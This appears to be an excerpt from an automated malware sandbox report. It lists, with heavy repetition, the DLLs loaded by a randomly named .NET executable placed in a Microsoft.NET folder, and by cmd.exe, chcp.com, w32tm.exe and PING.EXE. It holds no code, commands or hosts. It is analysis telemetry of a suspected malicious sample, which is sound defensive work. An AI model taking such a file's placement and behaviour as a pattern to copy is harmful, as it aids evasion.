Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dlnashext.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wpdshext.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dlnashext.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wpdshext.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dlnashext.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wpdshext.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dlnashext.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wpdshext.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: profapi.dll
